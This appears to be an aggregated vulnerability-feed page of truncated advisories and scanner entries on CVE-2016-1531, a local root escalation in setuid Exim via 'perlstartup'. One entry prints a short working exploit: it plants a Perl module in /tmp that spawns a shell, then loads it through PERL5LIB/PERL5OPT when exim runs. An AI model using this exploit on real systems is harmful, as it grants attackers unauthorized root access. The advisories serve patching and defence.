RHEL 4 : exim (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 4 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - exim: local root privilege escalation for configurations with perlstartup CVE-2016-1531 - The openlog...

GLSA-201607-12 : Exim: Arbitrary code execution

The remote host is affected by the vulnerability described in GLSA-201607-12 Exim: Arbitrary code execution Vulnerabilities have been discovered in Exims implementation of set-uid root and when using perlstartup. These vulnerabilities require a user account on the Exim server and a configuration...

Exim: Arbitrary code execution

Background Exim is a message transfer agent MTA designed to be a a highly configurable, drop-in replacement for sendmail. Description Vulnerabilities have been discovered in Exim’s implementation of set-uid root and when using ‘perlstartup’. These vulnerabilities require a user account on the Exi...

CVE-2016-1531

Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perlstartup argument...

Code injection

Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perlstartup argument...

CVE-2016-1531

Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perlstartup argument...

CVE-2016-1531

Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perlstartup argument...

Fedora 22 : exim-4.85.2-1.fc22 (2016-0e3ca94d88)

This is new version fixing local privilege escalation for set-uid root when using perlstartup. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possibl...

Exim 4.86.2 - Local Privilege Escalation

Exim 4.86.2 - Local Privilege Escalation ============================================= - Advisory release date: 10.03.2016 - Created by: Dawid Golunski - Severity: High/Critical ============================================= I. VULNERABILITY ------------------------- Exim 4.86.2 Local Root Privile...

Exim 4.84-3 - Privilege Escalation

Exploit for windows platform in category local exploits !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps 0day.today 2018-02-19...

FreeBSD : exim -- local privillege escalation (7d09b9ee-e0ba-11e5-abc4-6fb07af136d2)

The Exim development team reports : All installations having Exim set-uid root and using 'perlstartup' are vulnerable to a local privilege escalation. Any user who can start an instance of Exim and this is normally any user can gain root privileges. If you do not use 'perlstartup' you should be...

CVE-2016-1531

Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perlstartup argument...

exim -- local privillege escalation

The Exim development team reports: All installations having Exim set-uid root and using 'perlstartup' are vulnerable to a local privilege escalation. Any user who can start an instance of Exim and this is normally any user can gain root privileges. If you do not use 'perlstartup' you should be sa...